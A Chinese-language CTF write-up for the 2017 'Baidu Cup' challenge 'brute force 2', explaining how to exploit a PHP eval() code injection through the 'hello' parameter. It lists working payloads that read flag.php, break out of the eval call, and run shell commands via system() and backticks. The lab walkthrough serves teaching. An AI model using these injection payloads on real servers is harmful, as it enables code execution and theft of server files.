“百度杯”CTF比赛 2017 二月场-爆破-2

合集 - i春秋-选手训练营(15)

1.ISC2016训练赛-phrackCTF-FindKey2024-03-262.第三届上海市大学生网络安全大赛-crackme2024-03-273.2017年全国大学生信息安全竞赛-填数游戏2024-03-274.“百度杯”CTF比赛 2017 二月场-爆破-12024-03-28

5.“百度杯”CTF比赛 2017 二月场-爆破-22024-03-28

6.ISC2016训练赛-phrackCTF-Smali2024-03-287.“百度杯”CTF比赛 九月场-Upload2024-03-298.“百度杯”CTF比赛 九月场-SQL2024-03-309.《从0到1：CTFer成长之路》题目-SQL注入-22024-04-0210.“百度杯”CTF比赛 九月场-SQLi2024-04-0611.“百度杯”CTF比赛 2017 二月场-爆破-32024-04-1312.2017第二届广东省强网杯线上赛- who are you2024-04-1313.i春秋 第二届春秋欢乐赛-Hello-World2024-04-1714.“百度杯”CTF比赛 十月场-Login2024-04-1815.“百度杯”CTF比赛 九月场-1232024-04-18

收起

“百度杯”CTF比赛 2017 二月场

爆破-2

类型：misc-web

题目描述：flag不在变量中。

解题方法：打开靶机，得到一段php源码：

代码审计：

1.里面包含了flag.php文件

2.获取hello的值，并用var_dump函数输出相关的变量信息

我们试着传入参数：

?hello=$GLOBALS

这里我们发现flag的信息并没有在变量中，那我们猜测flag的值应该是藏在flag.php的源码中，分析代码是发现这里也没有设置过滤，就可以通过eval( "var_dump($a);");函数，就有好多种方法来获取flag.php的源码

方法一：

file_get_contents函数

file_get_contents函数把整个文件读入一个字符串中

构造payload就可以得到源码：

?hello=file_get_contents('flag.php')

查看网页源码就可以得到flag:

方法二：

file()函数：

file()函数与file_get_contents()类似，不同的是file()将文件作为一个数组返回，数组中的每个单元都是文件中相应的一行，包括换行符在内
构造payload：

?hello=file('flag.php')

方法三：

show_source函数和highlight_file函数：对文件进行高亮显示

用法：可以直接用：

?hello=show_source('flag.php')
?hello=highlight_file('flag.php')

也可以通过该函数对eval()函数进行截断重组，但是要保持eval()函数里面php代码的正确性：

?hello=1);show_source('flag.php');echo(1
?hello=1);highlight_file('flag.php');echo(1

对应的eval语句就是：

eval( "var_dump(1);show_source('flag.php');echo(1);");

即可得到flag

方法四：

可以通过linux命令来进行读取：

查看里面的文件：

?hello=system('ls')

可以用tac命令来读取flag

tac倒过来就是cat，是将文件倒着显示，即文章最后一行显示在最上边读取flag.php:

?hello=system('tac flag.php')

因为这里没有设置过滤，可以通过对eval()函数截断重组，注意要保持eval()函数里面php代码的正确性

通过测试，cat、tac、more、less、head、tail都可以使用

以cat为例来构造payload：

?hello=1);echo `cat flag.php`; echo(1

查看源代码即可得到flag